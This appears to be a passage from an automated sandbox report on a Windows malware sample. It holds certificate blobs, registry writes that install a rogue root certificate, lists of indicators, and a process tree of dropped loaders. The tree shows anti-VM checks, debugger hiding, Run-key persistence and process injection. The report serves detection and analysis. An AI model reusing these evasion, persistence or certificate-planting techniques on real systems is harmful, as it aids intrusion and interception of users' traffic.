5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e j7efxmeQRKfsUQJlnU7k63nh.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 j7efxmeQRKfsUQJlnU7k63nh.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstc.exepid process 5304 mstc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeexplorta.exeamert.exechrome.exe86fa24d474.exeexplorta.exechrosha.exerundll32.exepowershell.exetrf.exekeks.exejok.exepid process 4552 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe 4552 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe 3532 explorta.exe 3532 explorta.exe 1720 amert.exe 1720 amert.exe 1332 chrome.exe 1332 chrome.exe 4128 86fa24d474.exe 4128 86fa24d474.exe 4248 explorta.exe 4248 explorta.exe 432 chrosha.exe 432 chrosha.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5504 rundll32.exe 5836 powershell.exe 5836 powershell.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 2292 trf.exe 5836 powershell.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 3728 keks.exe 5676 jok.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
run.execmd.exepid process 5836 run.exe 3372 cmd.exe 3372 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
chrome.exepid process 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exedescription pid process Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe Token: SeShutdownPrivilege 1332 chrome.exe Token: SeCreatePagefilePrivilege 1332 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
f93de1e9ce.exechrome.exeu4bo.3.exepid process 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1436 f93de1e9ce.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1332 chrome.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 4420 u4bo.3.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
f93de1e9ce.exechrome.exeu4bo.3.exepid process 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1436 f93de1e9ce.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1332 chrome.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 1436 f93de1e9ce.exe 4420 u4bo.3.exe 4420 u4bo.3.exe 4420 u4bo.3.exe 4420 u4bo.3.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
run.exemstc.exepid process 5836 run.exe 5836 run.exe 5304 mstc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeexplorta.exef93de1e9ce.exechrome.exedescription pid process target process PID 4552 wrote to memory of 3532 4552 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe explorta.exe PID 4552 wrote to memory of 3532 4552 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe explorta.exe PID 4552 wrote to memory of 3532 4552 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe explorta.exe PID 3532 wrote to memory of 4476 3532 explorta.exe explorta.exe PID 3532 wrote to memory of 4476 3532 explorta.exe explorta.exe PID 3532 wrote to memory of 4476 3532 explorta.exe explorta.exe PID 3532 wrote to memory of 1720 3532 explorta.exe amert.exe PID 3532 wrote to memory of 1720 3532 explorta.exe amert.exe PID 3532 wrote to memory of 1720 3532 explorta.exe amert.exe PID 3532 wrote to memory of 1436 3532 explorta.exe f93de1e9ce.exe PID 3532 wrote to memory of 1436 3532 explorta.exe f93de1e9ce.exe PID 3532 wrote to memory of 1436 3532 explorta.exe f93de1e9ce.exe PID 1436 wrote to memory of 1332 1436 f93de1e9ce.exe chrome.exe PID 1436 wrote to memory of 1332 1436 f93de1e9ce.exe chrome.exe PID 1332 wrote to memory of 1052 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 1052 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3520 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3160 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 3160 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe PID 1332 wrote to memory of 4540 1332 chrome.exe chrome.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe"C:\Users\Admin\AppData\Local\Temp\6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000016001\f93de1e9ce.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\f93de1e9ce.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa68eab58,0x7ffaa68eab68,0x7ffaa68eab785⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4368 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4552 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3412 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4192 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:85⤵
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5080 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 --field-trial-handle=1836,i,17120757670757613787,12163038177187182290,131072 /prefetch:85⤵
-
C:\Users\Admin\1000017002\86fa24d474.exe"C:\Users\Admin\1000017002\86fa24d474.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
